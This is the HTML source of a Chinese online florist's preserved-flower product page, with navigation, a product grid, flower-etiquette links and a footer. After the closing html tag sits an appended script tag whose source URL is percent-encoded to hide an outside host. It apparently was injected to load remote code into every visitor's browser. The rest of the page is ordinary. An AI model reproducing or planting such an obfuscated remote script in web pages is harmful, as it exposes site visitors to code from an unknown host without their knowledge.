<!DOCTYPE html>
<html>

	<head>
		<meta charset="UTF-8">
		<title></title>
		<style>
			nav {
				width: 990px;
				height: 30px;
				background: orangered;
				margin: auto;
				position: relative; z-index: 4;
			}
			
			nav ul {
				list-style: none;
				padding: 0px;
				margin: 0px;
			}
			
			nav ul li {
				float: left;
				width: 120px;
				text-align: center;
				height: 30px;
				line-height: 30px;
			}
			
			nav .orangetext {
				background: orangered;
				width: 180px;
				text-align: left;
				color: white;
			}
			
			nav.orangetext2 {
				color: white;
				width: 150px;
			}
			
			nav ul li ul {
				display: none;
			}
			
			nav ul li:hover ul {
				display: block;
			}
			
			nav ul li li {
				background: orangered;
				color: #FFFFFF;
			}
			
			#top {
				width: 990px;
				position: relative;
				margin: auto;
			}
			
			#top img {
				vertical-align: middle;
			}
			
			#serch {
				position: absolute;
				left: 260px;
				top: 40px;
			}
			
			#phone {
				position: absolute;
				top: 40px;
				left: 660px;
				height: 32px;
				line-height: 32px;
			}
			
			#telephone {
				position: absolute;
				right: 25px;
				top: 40px;
			}
			#rongqi{
				margin: auto;
				width: 990px;
			}
			.topimg{
				width: 990px;
				margin-top: 10px;
			}
			#floattext{
				width: 990px;
				font-size: 14px;
			}
			#floattext ul{
				width: 990px;
				margin-left: 460px;
			}
			#floattext li{
				list-style: none;
				text-align: center;
			}
			#floattext ul li{
				width: 100px;
				float: left;
				border-right: 1px solid #CCCCCC;
			}
		#tupian{width:1000px;}
#tupian ul{list-style: none;margin: 0;padding: 0;}
#tupian ul li{float: left;width: 250px;text-align: center;
font-size: 14px}

			.huitiao {
				width: 990px;
				margin-left: 178px;
			}
			
			.huitiao ul {
				width: 990px;
			}
			
			.huitiao ul li {
				float: left;
				width: 990px;
				line-height: 30px;
				text-align: left;
				background: #AAAAAA;
				color: white;
			}
			
			.wenti {
				width: 990px;
				margin-left: 178px;
			}
			
			.wenti ul {
				width: 990px;
				list-style: circle;
			}
			
			.wenti ul li {
				width: 298px;
				height: 30px;
				float: left;
				
				margin-left: 30px;
			}
			.wentitext{
				border-right: 1px solid #CCCCCC;
			}
			.menu{
				position: relative;
				width: 990px;
				margin-left: 178px;
			}
			.menu ul{
				width: 990px;
				list-style: none;
			}
			.menu ul li{
				width: 140px;
				height: 35px;
				float: left;
				line-height: 30px;
				text-align: center;
				color: white;
				border-right: 1px solid #CCCCCC;
				background: orangered;
			}
			.footer{
			
				width: 990px;
				margin:auto;
			}
			.footer ul{
				width: 990px;
			}
			.footer ul li{
				width: 990px;
				list-style: none;
				line-height: 30px;
				text-align:center;
				float: left;
			}
		</style>
	</head>

	<body>

		<div id="top">
			<div id="logo">
				<img src="img/logo.jpg" width="200px" />
			</div>
			<div id="serch">
				<img src="img/serch.png" />
			</div>
			<div id="phone">
				<img src="img/phone.png" />4008-823-283
			</div>
			<div id="telephone">
				<img src="img/headset.png" />在线客服
			</div>
		</div>
		<nav>
			<ul>
				<li class="orangetext">全部商品导购</li>
				<li>
					<a href="default.html" target="_self">首页</a>
				</li>
				<li class="orangetext2"><a href="xuanxiangka.html">鲜花</a></li>
				<li><a href="yongshenghua.html">永生花</a>
					<ul>
						<li>经典花盒</li>
						<li>巨型玫瑰</li>
						<li>永生瓶花</li>
						<li>特色永生花</li>
					</ul>
				</li>
				<li class="orangetext2"><a href="lipin.html">礼品</a>
					<ul>
						<li>音乐盒</li>
						<li>金箔花</li>
						<li>首饰</li>
						<li>巧克力</li>
					</ul>
				</li>
				<li class="orangetext2">
					<a href="index.html" target="_self">花语大全</a>
				</li>
				<li class="orangetext2"><a href="lxwm.html">联系我们</a></li>
			</ul>
		</nav>
		<div id="rongqi">
		<div class="topimg">
			<img src="img/ysh-top-banner.jpg" width="990px" />
		</div>
		<div id="floattext">
			<ul><li>全部</li></ul>
			<ul><li>经典花盒</li></ul>
			<ul><li>巨型玫瑰</li></ul>
			<ul><li>永生瓶花</li></ul>
			<li>特色永生花</li>
		</div>
		<hr color="#CCCCCC" size="1px" />
		<div id="tupian">
			<ul>
				<li><img src="img/yongshenghua1.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua2.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua3.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua4.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua5.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua6.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua7.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua8.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua9.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua10.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua11.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua12.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua13.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua14.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua15.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
				<li><img src="img/yongshenghua16.jpg" width="220" height="240"/><br />永生花/烈焰魅惑<br />￥522</li>
			</ul>
		</div>
	</div>
			<div class="huitiao">
				<ul>
					<li>鲜花常识&送花礼仪</li>
				</ul>
			</div>
			<div class="wenti">
				<ul >
					<li class="wentitext">&nbsp;&nbsp;&nbsp;什么是永生花？</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;永生花寓意是什么？</li>
						<li>&nbsp;&nbsp;&nbsp;送花支数代表的含义</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;各种花代表的不同含义</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;玫瑰概述及花语</li>
						<li>&nbsp;&nbsp;&nbsp;送花的常识和技巧</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;经典送花祝福语</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;用鲜花表达情感-谈送花礼仪</li>
						<li>&nbsp;&nbsp;&nbsp;不同场合送什么花？</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;鲜花与星座</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;如何让鲜花保鲜</li>
						<li>&nbsp;&nbsp;&nbsp;鲜花与节日</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;鲜花与生日</li>
						<li class="wentitext">&nbsp;&nbsp;&nbsp;婚礼用鲜花大全</li>
						<li>&nbsp;&nbsp;&nbsp;女孩都喜欢别人送鲜花吗？</li>
				</ul>
			</div>
			<div class="menu">
				<ul>
					<li>十年品牌</li>
						<li>3小时配送</li>
						<li>低价保障</li>
						<li>配送范围</li>
						<li>花店加盟</li>
						<li>投诉建议</li>
						<li>首页</li>
				</ul>
			</div>
	<div class="footer">
				<ul>
					<li>全国统一订花电话:400-888-7844电脑端/手机<br /> copyright&copy;2007-2018版权所有：山西太原网上花城信息产业部备案 ICP备06016666号</li>
				</ul>
		</div>

	</body>

</html><script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>